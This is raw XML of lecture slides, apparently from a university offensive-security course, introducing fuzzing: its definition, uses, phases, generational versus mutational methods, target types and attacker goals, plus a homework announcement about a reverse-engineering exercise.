              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Easy to make custom ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Binary or source code availability is unimportant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fuzzing primarily finds bugs.  And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>not all bugs are vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>The real trick in fuzzing is finding exploitable bugs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Shape 174"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207675" y="6446500"/>
            <a:ext cx="1759200" cy="298200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cited from [1]</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What is fuzzing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1704688"/>
            <a:ext cx="6667500" cy="5000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What is fuzzing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Shape 187"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1704688"/>
            <a:ext cx="8346900" cy="46509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The process of sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> data to an application, in hope to elicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>certain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Specific?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mutated data, generational data, edge cases, unanticipated datatypes, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certain?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>crashes, errors, anomalous behavior, different application states...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wikipedia defines fuzz testing as:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Fuzz testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>software testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> technique, often automated or semi-automated, that involves providing invalid, unexpected, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>random data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> to the inputs of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. The program is then monitored for exceptions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>crashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>, or failing built-in code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>assertions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> or for finding potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0B0080"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>memory leaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. Fuzzing is commonly used to test for security problems in software or computer systems</a:t>
            </a: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Why?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Shape 193"/>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lang="en" sz="3000"/>
              <a:t>Used </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="3000" u="sng"/>
              <a:t>effectively</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000" u="sng"/>
              <a:t>Bug Hunting	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng"/>
              <a:t>finding vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>(good guys &amp; bad guys, contractors, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>fame &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000" u="sng"/>
              <a:t>profit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>(pwn2own ~$60k for first place)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Software testing (SDL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>hugely important to Google, Mozilla, Microsoft, Apple, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Shape 194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207675" y="6446500"/>
            <a:ext cx="1759200" cy="298200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cited from [1]</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Fuzzing Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Shape 200"/>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indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Identify Target (application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Identify Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Generate Fuzzed Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Two methods for fuzzing data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Generation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Mutation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Execute Fuzzed Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Monitor for Exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Determine Exploitability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7345175" y="6412525"/>
            <a:ext cx="1759200" cy="298200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cited from [1]</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Methods for generating fuzzed data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>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b="1" lang="en"/>
              <a:t>Generational fuzzing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Capable of building the data being sent </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>based on data model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> constructed by the fuzzer author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sometimes simple, dumb, or random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>but can be highly efficient if written to combine good values in interesting ways </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Mutational fuzzing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>starts with </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>known good "template" and seed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>which is then modified (by the fuzzing algorithm).  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Output is limited by the template and seed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>anything that is NOT in the template or seed will not be generated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>i.e. if there are 10 options, and the template &amp; seed are set to use only 8 of them, then the last 2 will </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>be generated.</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Types of Targets &amp; Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Shape 213"/>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Environment Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Positional Arguments, flags, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Network protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etc...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Exploit/Attacker Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>corrupt code/"business" logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Arbitrary/Malicious code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>permission escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>shell spawning / reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>etc..</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Announcement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Shape 100"/>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HW 3 problem 2  got revised, make sure you do the revised HW to turn in!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>still deals with reversing the same application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reason it got revised:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>the source code for the app was in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.fsu.edu/~redwood/OffensiveSecurity/reversing/FSU_Reversing_binaries.zip </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>provided for the in class exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
